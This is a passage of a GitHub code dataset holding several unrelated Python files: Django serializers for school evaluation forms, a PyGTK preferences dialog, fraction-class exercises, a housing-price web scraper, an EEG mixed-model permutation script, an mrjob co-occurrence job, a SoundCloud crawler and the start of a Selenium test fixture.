'school_level']\n\n def update(self, instance, validated_data):\n students_affairs_data = validated_data.pop('students_affairs')\n response_data = students_affairs_data.pop('response')\n students_affairs = StudentsAffairs.objects.get(pk = instance.students_affairs.id)\n print (students_affairs) # update only for the first record in the response table if the table is empty with one record\n try:\n if instance.students_affairs.response:\n #print (instance.students_affairs.response) \n update_response_if_not_empty(response_data, StudentAffairsResponse, students_affairs)\n except ObjectDoesNotExist:\n create_response_if_not_empty(response_data, StudentAffairsResponse, students_affairs)\n instance.students_affairs = students_affairs\n return instance\nclass AdminWorkersEvaluationFormSerializer(ModelSerializer):\n workers_affairs = AdminWorkersAffairsSerializer()\n class Meta:\n model = EvaluationForm\n fields = ['id', 'school_name', 'school_id', 'school_level','workers_affairs']\n read_only_fields = ['id', 'school_name', 'school_id', 'school_level']\n\n def update(self, instance, validated_data):\n workers_affairs_data = validated_data.pop('workers_affairs')\n response_data = workers_affairs_data.pop('response')\n workers_affairs = WorkersAffairs.objects.get(pk = instance.workers_affairs.id)\n try:\n if instance.workers_affairs.response:\n update_response_if_not_empty(response_data, 
WorkersAffairsResponse, workers_affairs)\n        except ObjectDoesNotExist:\n            create_response_if_not_empty(response_data, WorkersAffairsResponse, workers_affairs)\n        instance.workers_affairs = workers_affairs\n        return instance\n\nclass AdminTrainingEvaluationFormSerializer(ModelSerializer):\n    training = AdminTrainingSerializer()\n    class Meta:\n        model = EvaluationForm\n        fields = ['id', 'school_name', 'school_id', 'school_level','training']\n        read_only_fields = ['id', 'school_name', 'school_id', 'school_level']\n\n    def update(self, instance, validated_data):\n        training_data = validated_data.pop('training')\n        response_data = training_data.pop('response')\n        training = Training.objects.get(pk = instance.training.id)\n        try:\n            if instance.training.response:\n                update_response_if_not_empty(response_data, TrainingResponse, training)\n        except ObjectDoesNotExist:\n            create_response_if_not_empty(response_data, TrainingResponse, training)\n        instance.training = training\n        return instance\n\nclass AdminNutritionEvaluationFormSerializer(ModelSerializer):\n    nutrition = AdminNutritionSerializer()\n    class Meta:\n        model = EvaluationForm\n        fields = ['id', 'school_name', 'school_id', 'school_level','nutrition']\n        read_only_fields = ['id', 'school_name', 'school_id', 'school_level']\n\n    def update(self, instance, validated_data):\n        nutrition_data = validated_data.pop('nutrition')\n        response_data = nutrition_data.pop('response')\n        nutrition = Nutrition.objects.get(pk = instance.nutrition.id)\n        try:\n            if instance.nutrition.response:\n                update_response_if_not_empty(response_data, NutritionResponse, nutrition)\n        except ObjectDoesNotExist:\n            create_response_if_not_empty(response_data, NutritionResponse, nutrition)\n        instance.nutrition = nutrition\n        return instance\n\nclass AdminEnvironmentPopulationEvaluationFormSerializer(ModelSerializer):\n    environment_population = AdminEnvironmentPopulationSerializer()\n    class Meta:\n        model = EvaluationForm\n        fields = ['id', 'school_name', 'school_id', 'school_level','environment_population']\n        read_only_fields = ['id', 'school_name', 'school_id', 'school_level']\n\n    def update(self, instance, validated_data):\n        environment_data = validated_data.pop('environment_population')\n        response_data = environment_data.pop('response')\n        environment = EnvironmentPopulation.objects.get(pk = instance.environment_population.id)\n        try:\n            if instance.environment_population.response:\n                update_response_if_not_empty(response_data, EnvironmentPopulationResponse, environment)\n        except ObjectDoesNotExist:\n            create_response_if_not_empty(response_data, EnvironmentPopulationResponse, environment)\n        instance.environment_population = environment\n        return instance\n    \nclass AdminCooperativeEvaluationFormSerializer(ModelSerializer):\n    cooperative = AdminCooperativeSerializer()\n    class Meta:\n        model = EvaluationForm\n        fields = ['id', 'school_name', 'school_id', 'school_level','cooperative']\n        read_only_fields = ['id', 'school_name', 'school_id', 'school_level']\n\n    def update(self, instance, validated_data):\n        cooperative_data = validated_data.pop('cooperative')\n        response_data = cooperative_data.pop('response')\n        cooperative = Cooperative.objects.get(pk = instance.cooperative.id)\n        try:\n            if instance.cooperative.response:\n                update_response_if_not_empty(response_data, CooperativeResponse, cooperative)\n        except ObjectDoesNotExist:\n            create_response_if_not_empty(response_data, CooperativeResponse, cooperative)\n        instance.cooperative = cooperative\n        return instance\n\nclass AdminProductionUnitEvaluationFormSerializer(ModelSerializer):\n    production_unit = 
AdminProductionUnitSerializer()\n class Meta:\n model = EvaluationForm\n fields = ['id', 'school_name', 'school_id', 'school_level','production_unit']\n read_only_fields = ['id', 'school_name', 'school_id', 'school_level']\n\n def update(self, instance, validated_data):\n production_unit_data = validated_data.pop('production_unit')\n response_data = production_unit_data.pop('response')\n production_unit = ProductionUnit.objects.get(pk = instance.production_unit.id)\n try:\n if instance.production_unit.response:\n update_response_if_not_empty(response_data, ProductionUnitResponse, production_unit)\n except ObjectDoesNotExist:\n create_response_if_not_empty(response_data, ProductionUnitResponse, production_unit)\n instance.production_unit = production_unit\n return instance\n\nclass AdminSecuritySafetyEvaluationFormSerializer(ModelSerializer):\n security_safety = AdminSecuritySafetySerializer()\n class Meta:\n model = EvaluationForm\n fields = ['id', 'school_name', 'school_id', 'school_level','security_safety']\n read_only_fields = ['id', 'school_name', 'school_id', 'school_level']\n\n def update(self, instance, validated_data):\n security_safety_data = validated_data.pop('security_safety')\n response_data = security_safety_data.pop('response')\n security_safety = SecuritySafety.objects.get(pk = instance.security_safety.id)\n try:\n if instance.security_safety.response:\n update_response_if_not_empty(response_data, SecuritySafetyResponse, security_safety)\n except ObjectDoesNotExist:\n create_response_if_not_empty(response_data, SecuritySafetyResponse, security_safety)\n instance.security_safety = security_safety\n return instance\n\nclass AdminTeachersEvaluationFormSerializer(ModelSerializer):\n teachers = AdminTeachersSerializer()\n class Meta:\n model = EvaluationForm\n fields = ['id', 'school_name', 'school_id', 'school_level','teachers']\n read_only_fields = ['id', 'school_name', 'school_id', 'school_level']\n\n def update(self, instance, validated_data):\n teachers_data = validated_data.pop('teachers')\n response_data = teachers_data.pop('response')\n teachers = Teachers.objects.get(pk = instance.teachers.id)\n try:\n if instance.teachers.response:\n update_response_if_not_empty(response_data, TeachersResponse, teachers)\n except ObjectDoesNotExist:\n create_response_if_not_empty(response_data, TeachersResponse, teachers)\n instance.teachers = teachers\n return instance\n\nclass AdminStrategicPlanningEvaluationFormSerializer(ModelSerializer):\n strategic_planning = AdminStrategicPlanningSerializer()\n class Meta:\n model = EvaluationForm\n fields = ['id', 'school_name', 'school_id', 'school_level','strategic_planning']\n read_only_fields = ['id', 'school_name', 'school_id', 'school_level']\n\n def update(self, instance, validated_data):\n strategic_planning_data = validated_data.pop('strategic_planning')\n response_data = strategic_planning_data.pop('response')\n strategic_planning = StrategicPlanning.objects.get(pk = instance.strategic_planning.id)\n try:\n if instance.strategic_planning.response:\n update_response_if_not_empty(response_data, StrategicPlanningResponse, strategic_planning)\n except ObjectDoesNotExist:\n create_response_if_not_empty(response_data, StrategicPlanningResponse, strategic_planning)\n instance.strategic_planning = strategic_planning\n return instance\n\nclass AdminAdministrationEvaluationFormSerializer(ModelSerializer):\n administration = AdminAdministrationSerializer()\n class Meta:\n model = EvaluationForm\n fields = ['id', 'school_name', 'school_id', 
'school_level','administration']\n read_only_fields = ['id', 'school_name', 'school_id', 'school_level']\n\n def update(self, instance, validated_data):\n administration_data = validated_data.pop('administration')\n response_data = administration_data.pop('response')\n administration = Administration.objects.get(pk = instance.administration.id)\n try:\n if instance.administration.response:\n update_response_if_not_empty(response_data, AdministrationResponse, administration)\n except ObjectDoesNotExist:\n create_response_if_not_empty(response_data, AdministrationResponse, administration)\n instance.administration = administration\n return instance\n\nclass AdminQualityEvaluationFormSerializer(ModelSerializer):\n quality = AdminQualitySerializer()\n class Meta:\n model = EvaluationForm\n fields = ['id', 'school_name', 'school_id', 'school_level','quality']\n read_only_fields = ['id', 'school_name', 'school_id', 'school_level']\n\n def update (self, instance,validated_data):\n quality_data = validated_data.pop('quality')\n response_data = quality_data.pop('response')\n quality = Quality.objects.get(pk = instance.quality.id)\n try:\n if instance.quality.response:\n update_response_if_not_empty(response_data, QualityResponse, quality)\n except ObjectDoesNotExist:\n create_response_if_not_empty(response_data, QualityResponse, quality)\n instance.quality = quality\n return instance\n\nclass AdminDecentralizationEvaluationFormSerializer(ModelSerializer):\n decentralization = AdminDecentralizationSerializer()\n class Meta:\n model = EvaluationForm\n fields = ['id', 'school_name', 'school_id', 'school_level','decentralization']\n read_only_fields = ['id', 'school_name', 'school_id', 'school_level']\n\n def update(self, instance, validated_data):\n decentralization_data = validated_data.pop('decentralization')\n response_data = decentralization_data.pop('response')\n decentralization = Decentralization.objects.get(pk = instance.decentralization.id)\n try:\n if instance.decentralization.response:\n update_response_if_not_empty(response_data, DecentralizationResponse, decentralization)\n except ObjectDoesNotExist:\n create_response_if_not_empty(response_data, DecentralizationResponse, decentralization)\n instance.decentralization = decentralization\n return instance\n\nclass AdminLaboratoriesEvaluationFormSerializer(ModelSerializer):\n laboratories = AdminLaboratoriesSerializer()\n class Meta:\n model = EvaluationForm\n fields = ['id', 'school_name', 'school_id', 'school_level','laboratories']\n read_only_fields = ['id', 'school_name', 'school_id', 'school_level']\n\n def update(self, instance, validated_data):\n laboratories_data = validated_data.pop('laboratories')\n response_data = laboratories_data.pop('response')\n laboratories = Laboratories.objects.get(pk = instance.laboratories.id)\n try:\n if instance.laboratories.response:\n update_response_if_not_empty(response_data, LaboratoriesResponse, laboratories)\n except ObjectDoesNotExist:\n create_response_if_not_empty(response_data, LaboratoriesResponse, laboratories)\n instance.laboratories = laboratories\n return instance","repo_name":"zico-son/Educational-Administration-Tracker-System","sub_path":"EvaluateHub/admin_serializers.py","file_name":"admin_serializers.py","file_ext":"py","file_size_in_byte":21567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"39846115033","text":"import logging\nimport pygtk\npygtk.require('2.0')\n\nimport gtk\nimport gconf\nimport gobject\n\nclass 
PreferencesBox(gobject.GObject):\n __gsignals__ = {\n 'new-preferences':(gobject.SIGNAL_RUN_LAST, gobject.TYPE_NONE, (gobject.TYPE_GSTRING, gobject.TYPE_GSTRING,)),\n }\n \n archs = {\n 'stable':['alpha','amd64','arm','hppa','i386','ia64','mips','mipsel','powerpc','s390','sparc'],\n 'testing':['alpha','amd64','arm','armel','hppa','i386','ia64','mips','mipsel','powerpc','s390','sparc'],\n 'unstable':['alpha','amd64','arm','armel','hppa','hurd-i386','i386','ia64','m68k','mips','mipsel','powerpc','s390','sparc']}\n\n def __init__(self, paths, distro, arch):\n gobject.GObject.__init__(self)\n self.current_distro = distro\n self.current_arch = arch\n self.gui = gtk.Builder()\n self.gui.add_from_file(paths.get_in_data_path('debweather.ui'))\n self.dlg_prefs = self.gui.get_object('dlg_prefs')\n self.btn_apply = self.gui.get_object('btn_apply')\n self.cmb_distro = self.gui.get_object('cmb_distro')\n self.cmb_arch = self.gui.get_object('cmb_arch')\n self.lst_distros = self.cmb_distro.get_model()\n self.lst_archs = self.cmb_arch.get_model()\n distro_cell = gtk.CellRendererText()\n arch_cell = gtk.CellRendererText()\n self.cmb_distro.pack_start(distro_cell, True)\n self.cmb_distro.add_attribute(distro_cell, 'text', 0) \n self.cmb_arch.pack_start(arch_cell, True)\n self.cmb_arch.add_attribute(arch_cell, 'text', 0) \n self.gui.connect_signals(self)\n\n def set_current_distro(self, distro):\n self.current_distro = distro\n \n def set_current_arch(self, arch):\n self.current_arch = arch\n\n def show(self):\n for i,d in enumerate(self.lst_distros):\n if d[0] == self.current_distro:\n self.cmb_distro.set_active(i)\n\n self.lst_archs.clear()\n for i,arch in enumerate(self.archs[self.current_distro]):\n self.lst_archs.append([arch])\n logging.debug('Appending arch: %s' % arch)\n if arch == self.current_arch:\n self.cmb_arch.set_active(i)\n self.btn_apply.set_sensitive(False)\n self.dlg_prefs.show()\n\n def on_cmb_distro_changed(self, widget):\n self.lst_archs.clear()\n current_distro = self.lst_distros[self.cmb_distro.get_active()][0]\n for i,arch in enumerate(self.archs[current_distro]):\n self.lst_archs.append([arch])\n logging.debug('Appending arch: %s' % arch)\n\n self.btn_apply.set_sensitive(False)\n logging.debug(\"Distro changed\")\n\n def on_cmb_arch_changed(self, widget):\n logging.debug(\"Arch changed\")\n self.btn_apply.set_sensitive(True)\n\n def on_btn_apply_clicked(self, widget):\n logging.debug(\"Apply\")\n distro = self.cmb_distro.get_active_text()\n arch = self.cmb_arch.get_active_text()\n conf_client = gconf.client_get_default()\n if conf_client.dir_exists('/apps/debian-weather-applet'):\n conf_client.set_string('/apps/debian-weather-applet/distro', distro)\n conf_client.set_string('/apps/debian-weather-applet/arch', arch)\n self.emit('new-preferences', distro, arch)\n self.dlg_prefs.hide()\n\n def on_btn_cancel_clicked(self, widget):\n logging.debug(\"Cancel\")\n self.dlg_prefs.hide()\n\ngobject.type_register(PreferencesBox)\n","repo_name":"denever/debweather","sub_path":"debweatherlib/preferencesbox.py","file_name":"preferencesbox.py","file_ext":"py","file_size_in_byte":3460,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"35150636640","text":"# wyklad 3 zad 1\n\nfrom math import gcd\n\nclass MyFraction():\n def __init__(self, numerator, denominator = 1):\n self.numerator = int(numerator / gcd(numerator, denominator))\n self.denominator = int(denominator / gcd(numerator, denominator))\n \n def __add__(self, other):\n if 
type(other) == int:\n            n = self.numerator + self.denominator * other\n            d = self.denominator\n        else:\n            n = self.numerator * other.denominator + self.denominator * other.numerator\n            d = self.denominator * other.denominator\n        return MyFraction(n, d)\n    \n    def __eq__(self, other):\n        return (self.numerator == other.numerator) and (self.denominator == other.denominator)\n    \n    def __iadd__(self, other):\n        if type(other) == int:\n            n = self.numerator + self.denominator * other\n            d = self.denominator\n        else:\n            sn = self.numerator \n            sd = self.denominator \n            on = other.numerator \n            od = other.denominator\n            n = (sn*od + sd*on)\n            d = sd * od \n        self.numerator = n // gcd(n,d)\n        self.denominator = d // gcd(n,d)\n        return self\n    \n    def __radd__(self, other):\n        if type(other) == int:\n            n = self.numerator + self.denominator * other\n            d = self.denominator\n        else:\n            n = self.numerator * other.denominator + self.denominator * other.numerator\n            d = self.denominator * other.denominator\n        return MyFraction(n,d)\n    \n    def __repr__(self):\n        return '{}(numerator={}, denominator={})'.format(\n            self.__class__.__name__, self.numerator, self.denominator)\n    \n    def __str__(self): \n        return '{}(numerator={}, denominator={})'.format(\n            self.__class__.__name__, self.numerator, self.denominator)\n##### model solution written by the teacher \n\nimport math\n\n\nclass MyFraction:\n\tdef __init__(self, numerator, denominator=1):\n\t\tif isinstance(numerator, MyFraction):\n\t\t\tself.numerator = numerator.numerator\n\t\t\tself.denominator = numerator.denominator\n\t\telse:\n\t\t\tself.numerator = numerator\n\t\t\tself.denominator = denominator\n\t\tself._reduce()\n\n\tdef _reduce(self):\n\t\tnd_gcd = math.gcd(\n\t\t\tself.numerator, self.denominator\n\t\t)\n\t\tself.numerator //= nd_gcd\n\t\tself.denominator //= nd_gcd\n\n\tdef _inner_add(self, other):\n\t\tother = MyFraction(other)\n\t\t# a/b + c/d = (a*d + c*b)/(b*d) = g/h\n\t\ta = self.numerator\n\t\tb = self.denominator\n\t\tc = other.numerator\n\t\td = other.denominator\n\t\tg = a*d + c*b\n\t\th = b*d\n\t\treturn g, h\n\n\n\tdef __add__(self, other):\n\t\tg, h = self._inner_add(other)\n\t\treturn MyFraction(g, h)\n\n\tdef __eq__(self, other):\n\t\treturn (\n\t\t\tself.numerator == other.numerator\n\t\t\tand self.denominator == other.denominator\n\t\t)\n\n\tdef __iadd__(self, other):\n\t\tself.numerator, self.denominator = self._inner_add(other)\n\t\tself._reduce()\n\t\treturn self\n\n\tdef __radd__(self, other):\n\t\treturn self + other\n\n\tdef __repr__(self):\n\t\treturn '{}(numerator={}, denominator={})'.format(\n\t\t\tself.__class__.__name__,\n\t\t\tself.numerator,\n\t\t\tself.denominator\n\t\t)\n","repo_name":"Lozdowski/daftacademy-python4beginners","sub_path":"Lecture_03/L03_task_01.py","file_name":"L03_task_01.py","file_ext":"py","file_size_in_byte":2899,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"70661295405","text":"# exercise on p. 27 - book: Introduction to the Python Language\r\n# example of basic exception handling - try and except\r\ns = input (\"enter an integer: \")\r\ntry:\r\n    i = int (s)\r\n    print (\"valid integer entered: \", i)\r\nexcept ValueError as err:\r\n    print(err)\r\n\r\n\r\n\r\n","repo_name":"dgrej/python-study","sub_path":"PensePython/1_try_and_except.py","file_name":"1_try_and_except.py","file_ext":"py","file_size_in_byte":255,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"32341383387","text":"# import library\nimport requests\nfrom bs4 import 
BeautifulSoup\nfrom urllib.request import Request, urlopen\nimport re\nfrom database_connect import insert_data, export_database_to_csv_file\n\n\n\nfor page_number in range(1,10):\n\n    # connect to website redfin and read html file\n    url_test = f'https://www.redfin.com/city/29470/IL/Chicago/page-{page_number}'\n    # url_test = f'https://www.redfin.com/city/29470/IL/Chicago/page-'\n\n    site = url_test\n    hdr = {'User-Agent': 'Mozilla/5.0'}\n    req = Request(site, headers=hdr)\n    page = urlopen(req)\n    soup = BeautifulSoup(page, 'html.parser')\n\n    # extract data for home features (number of beds, number of baths, area)\n    feature_homes = soup.findAll('div', attrs={'class':'HomeStatsV2 font-size-small'})\n    # extract data for prices\n    prices = soup.findAll('span', attrs={'class':\"homecardV2Price\"})\n    # extract data for address\n    address_s = soup.findAll('div',attrs={'class':'homeAddressV2'})\n    \n    \n    for count in range(len(feature_homes)):\n        \n        item = feature_homes[count]\n        price = prices[count]\n        address = address_s[count]\n        \n        # extract city or region from the address text\n        address_s__ = address.text\n        address_s_l = address_s__.split(',')[-2]\n        \n        # strip symbols so the price string can be parsed as an int\n        price = price.text\n        price_ = re.sub('\$', '', str(price))\n        price_ = re.sub(',', '', str(price_))\n        \n        # extract number of beds, number of baths, and area from feature_homes \n        beds_item = item.findAll('div', attrs={'class':'stats'})[0].string\n        baths_items = item.findAll('div', attrs={'class':'stats'})[1].string\n        area_Sq_item = item.findAll('div', attrs={'class':'stats'})[2].string\n        \n        # strip the unit text so beds_item can be parsed as a number\n        beds_item = re.sub(' Beds', '', str(beds_item))\n        beds_item = re.sub(' Bed', '', beds_item)\n        \n        # strip the unit text so baths_items can be parsed as a number\n        baths_items = re.sub(' Baths', '', str(baths_items))\n        baths_items = re.sub(' Bath', '', baths_items)\n        \n        # strip the unit text so area_Sq_item can be parsed as a number\n        area_Sq_item = re.sub(' Sq. 
Ft.', '', str(area_Sq_item))\n area_Sq_item = re.sub(',', '.', str(area_Sq_item))\n\n insert_data(area=area_Sq_item, number_bedrooms=beds_item, number_bath=baths_items, property_address=address_s_l, price=price_)\n\n\n\n# export all data table feature home to ","repo_name":"HaniehKhalesi/predict-price-home-with-machine-learning","sub_path":"extract_data.py","file_name":"extract_data.py","file_ext":"py","file_size_in_byte":2510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"7621120147","text":"import numpy as np\nimport mne\nfrom cnx_utils import load_sparse, phi\nimport argparse\nimport pickle\nfrom statsmodels.regression.mixed_linear_model import MixedLM\nfrom mne.stats.cluster_level import _setup_connectivity, _find_clusters, \\\n _reshape_clusters\nimport pandas as pd\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\ndef mass_uv_mixedlmm(formula, data, uv_data, group_id, re_formula=None):\n mods = []\n for d_idx in range(uv_data.shape[1]):\n print(\"{} of {}\".format(d_idx, uv_data.shape[1]), end=\"\\r\")\n data_temp = data.copy()\n data_temp[\"Brain\"] = uv_data[:,d_idx]\n model = MixedLM.from_formula(formula, data_temp, groups=group_id)\n try:\n mod_fit = model.fit()\n except:\n mods.append(None)\n continue\n mods.append(mod_fit)\n return mods\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--perm', type=int, default=500)\nparser.add_argument('--iter', type=int, default=0)\nparser.add_argument('--band', type=str, required=True)\nopt = parser.parse_args()\n\nsubjs = [\"ATT_10\", \"ATT_11\", \"ATT_12\", \"ATT_13\", \"ATT_14\", \"ATT_15\", \"ATT_16\",\n \"ATT_17\", \"ATT_18\", \"ATT_19\", \"ATT_20\", \"ATT_21\", \"ATT_22\", \"ATT_23\",\n \"ATT_24\", \"ATT_25\", \"ATT_26\", \"ATT_28\", \"ATT_31\", \"ATT_33\", \"ATT_34\",\n \"ATT_35\", \"ATT_36\", \"ATT_37\"]\n\nband_info = {}\nband_info[\"theta_0\"] = {\"freqs\":list(np.arange(3,7)),\"cycles\":3}\nband_info[\"alpha_0\"] = {\"freqs\":list(np.arange(7,10)),\"cycles\":5}\nband_info[\"alpha_1\"] = {\"freqs\":list(np.arange(10,13)),\"cycles\":7}\nband_info[\"beta_0\"] = {\"freqs\":list(np.arange(13,22)),\"cycles\":9}\nband_info[\"beta_1\"] = {\"freqs\":list(np.arange(22,31)),\"cycles\":9}\nband_info[\"gamma_0\"] = {\"freqs\":list(np.arange(31,41)),\"cycles\":9}\nband_info[\"gamma_1\"] = {\"freqs\":list(np.arange(41,60)),\"cycles\":9}\nband_info[\"gamma_2\"] = {\"freqs\":list(np.arange(60,91)),\"cycles\":9}\n\n# parameters and setup\nroot_dir = \"/home/jeff/ATT_dat/\"\n#root_dir = \"/scratch/jeffhanna/ATT_dat/\"\nproc_dir = root_dir + \"proc/\"\nspacing = \"ico4\"\nconds = [\"rest\",\"audio\",\"visual\",\"visselten\",\"zaehlen\"]\nwavs = [\"4000Hz\",\"4000cheby\",\"7000Hz\",\"4000fftf\"]\nband = opt.band\nindep_var = None\nperm_n = opt.perm\n\ndf_laut = pd.read_pickle(root_dir+\"behave/laut\")\ndf_ang = pd.read_pickle(root_dir+\"behave/ang\")\n\npredictor_vars = [\"Laut\",\"Subj\",\"Block\",\"Wav\"]\ndm_laut = df_laut.copy()[predictor_vars]\n\npredictor_vars = [\"Angenehm\",\"Subj\",\"Block\",\"Wav\"]\npredictor_vars = [\"Subj\",\"Block\"]\ndm_ang = df_ang.copy()[predictor_vars]\n\nif indep_var == \"Angenehm\":\n dm = dm_ang\nelif indep_var == \"Laut\":\n dm = dm_laut\nelse:\n dm = None\n\ndata = []\ndm_new = pd.DataFrame(columns=predictor_vars)\nidx_borders = []\nidx_border = 0\ngroup_id = []\nfor sub_idx,sub in enumerate(subjs):\n idx_borders.append([idx_border])\n # make the df and data object for this particular subject\n for cond_idx,cond in 
enumerate(conds):\n data_temp = load_sparse(\"{}nc_{}_{}_dPTE_{}.sps\".format(proc_dir,\n sub, cond,\n band))\n for epo_idx in range(data_temp.shape[0]):\n if indep_var:\n sel_inds = (dm[\"Block\"]==cond) & (dm[\"Subj\"]==sub)\n dm_new = dm_new.append(dm[sel_inds])\n else:\n dm_new = dm_new.append({\"Subj\":sub, \"Block\":cond}, ignore_index=True)\n data.append(phi(data_temp[epo_idx,], k=1))\n group_id.append(sub_idx)\n idx_border += 1\n idx_borders[-1].append(idx_border)\ndata = np.array(data)\ngroup_id = np.array(group_id)\nif indep_var:\n col_idx = dm_new.columns.get_loc(indep_var)\nelse:\n col_idx = 1\n\nif indep_var:\n formula = \"Brain ~ {} + Block\".format(indep_var)\nelse:\n formula = \"Brain ~ C(Block, Treatment('rest'))\"\n\n# # get main result\n# mods = mass_uv_mixedlmm(formula, dm_new, data, group_id)\n# for mod_idx,mod in enumerate(mods):\n# mod.save(\"{}{}/reg70_lmm_{}.pickle\".format(proc_dir,opt.band,mod_idx))\n\n# permute\nall_perm_tvals = [[],[],[],[]]\nfor i in range(perm_n):\n print(\"Permutation {} of {}\".format(i, perm_n))\n dm_perm = dm_new.copy()\n for idx_border in idx_borders:\n if indep_var:\n temp_slice = dm_perm[indep_var][idx_border[0]:idx_border[1]].copy()\n else:\n temp_slice = dm_perm[\"Block\"][idx_border[0]:idx_border[1]].copy()\n temp_slice = temp_slice.sample(frac=1)\n dm_perm.iloc[idx_border[0]:idx_border[1],col_idx] = temp_slice.values\n perm_mods = mass_uv_mixedlmm(formula, dm_perm, data, group_id)\n for pm in perm_mods:\n all_perm_tvals[0].append(pm.tvalues.get(\"C(Block, Treatment('rest'))[T.audio]\"))\n all_perm_tvals[1].append(pm.tvalues.get(\"C(Block, Treatment('rest'))[T.visselten]\"))\n all_perm_tvals[2].append(pm.tvalues.get(\"C(Block, Treatment('rest'))[T.visual]\"))\n all_perm_tvals[3].append(pm.tvalues.get(\"C(Block, Treatment('rest'))[T.zaehlen]\"))\nall_perm_tvals = np.array(all_perm_tvals)\nnp.save(\"{}cnx_{}_{}_perm_{}_{}.npy\".format(proc_dir, indep_var, band, perm_n, opt.iter),\n all_perm_tvals)\n","repo_name":"TinnErlangen/ATT","sub_path":"cnx/cnx_lmm_permute_hpc.py","file_name":"cnx_lmm_permute_hpc.py","file_ext":"py","file_size_in_byte":5133,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"4424555399","text":"import json\nfrom collections import defaultdict\n\nsplit = \"test\"\nwith open(f\"{split}.json\", 'r') as f:\n data = json.load(f)\n\n# question_type_split = defaultdict(list)\ntokens = defaultdict(int)\nfor d in data:\n for token in d[\"answer\"].split():\n tokens[token] += 1\n for sent in d[\"alter_answers\"]:\n for token in sent.split():\n tokens[token] += 1\n\nsorted_tokens = {k: v for k, v in sorted(tokens.items(), key=lambda item: item[1])}\n\nprint(sorted_tokens)\n\n# for t, itms in question_type_split.items():\n # print(f\"{t}: {len(itms)}\")\n # print(f\"{t}: {sum(itms)/len(itms)}\")\n\n# for t, itms in question_type_split.items():\n# with open(f\"{split}_{t}.json\", 'w') as f:\n# json.dump(itms, f, indent=4)","repo_name":"MichiganNLP/In-the-wild-QA","sub_path":"src/example_data/wildQA-data/examine.py","file_name":"examine.py","file_ext":"py","file_size_in_byte":740,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"19"} +{"seq_id":"9369864843","text":"from mrjob.job import MRJob\r\nimport re\r\n\r\nclass CoTermNSPair(MRJob):\r\n\r\n def mapper(self, _, line):\r\n words = re.split(\"[ *$&#/\\t\\n\\f\\\"\\'\\\\,.:;?!\\[\\](){}<>~\\-_]\", line.lower())\r\n words = list(filter(None, words))\r\n\r\n for i, word in 
enumerate(words):\r\n wordList = words[i+1:len(words)]\r\n # Generate a pair of (w, u) where u appears after w in words\r\n pairList = self.pairGen(word,wordList)\r\n for pair in pairList:\r\n yield(pair, 1) \r\n\r\n def reducer(self, pair, counts):\r\n yield(pair, sum(counts))\r\n\r\n # Given a word and a list of words, return a list of pairs\r\n def pairGen(self, w, words):\r\n pairList = []\r\n for u in words:\r\n pair = w + \" \" + u\r\n pairList.append(pair)\r\n return pairList\r\n\r\nif __name__ == '__main__':\r\n\r\n CoTermNSPair.run()\r\n","repo_name":"Abdullah527382/comp9313-revision","sub_path":"mapreduce/lab03/mr_CoTermNSPair.py","file_name":"mr_CoTermNSPair.py","file_ext":"py","file_size_in_byte":885,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"35991067961","text":"import pickle\n\ndataDict = {}\n\ndef write():\n global dataDict\n f = open(\"data.dat\", \"ab\")\n n = int(input(\"Enter number of students : \"))\n while(n!=0):\n rollNumber = input(\"Enter roll number : \")\n studentName = input(\"Enter student name : \")\n dataDict[rollNumber] = studentName\n n-=1\n pickle.dump(dataDict, f)\n dataDict = {}\n f.close()\n\ndef read():\n print(\"Get info about student\")\n try:\n f = open(\"data.dat\", \"rb\")\n except FileNotFoundError:\n print(\"Please enter data first!\")\n quit()\n data = pickle.load(f)\n rollNumber = input(\"Enter roll number : \")\n if rollNumber not in data.keys():\n print(\"This roll number does not exist.\")\n else:\n print(\"Student name : \", data[rollNumber],)\n f.close()\n\n\nwrite()\nwhile(True):\n read()","repo_name":"delta911ee/homeworks","sub_path":"Report/program3.py","file_name":"program3.py","file_ext":"py","file_size_in_byte":832,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"7184347540","text":"import webapp2\nimport json\nimport re\nimport urllib\nimport logging\n\nclass SoundcloudCrawlerHandler(webapp2.RequestHandler):\n\tdef get(self, permalink):\n\t\tpermalink_url = \"http://soundcloud.com/\" + permalink\n\t\ttwitter = None\n\t\t\n\t\tfile = urllib.urlopen(permalink_url)\n\t\ttry:\n\t\t\tpage = file.read()\n\t\tfinally:\n\t\t\tfile.close()\n\t\t\t\t\t\n\t\tresult = re.search(r'a\\shref=\\\"https?:\\/\\/w?w?w?\\.?twitter\\.com\\/?#?!?\\/(\\w+)\\\"\\sclass=\\\"twitter\\s\\\"', page)\n\t\tif(result):\n\t\t\ttwitter = result.group(1)\n\t\t\t\t\n\t\tresponse = {\n\t\t\t\"twitter\" : twitter,\n\t\t}\n\t\t\n\t\tself.response.out.write(json.dumps(response))","repo_name":"detcherry/phonoblaster","sub_path":"controllers/crawler/soundcloud.py","file_name":"soundcloud.py","file_ext":"py","file_size_in_byte":578,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"19"} +{"seq_id":"23093639689","text":"import pytest\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.common.by import By\r\nfrom selenium.webdriver.support.ui import WebDriverWait\r\nfrom selenium.webdriver.support import expected_conditions as EC\r\nfrom config import valid_email, valid_password, base_url\r\n\r\n\r\n@pytest.fixture(autouse=True)\r\ndef test_driver():\r\n driver = webdriver.Chrome('C:/Users/Flame/PycharmProjects/chromedriver.exe')\r\n driver.implicitly_wait(5)\r\n driver.get(f'{base_url}login')\r\n WebDriverWait(driver, 5).until(EC.presence_of_element_located((By.ID, 'email'))).send_keys(valid_email)\r\n WebDriverWait(driver, 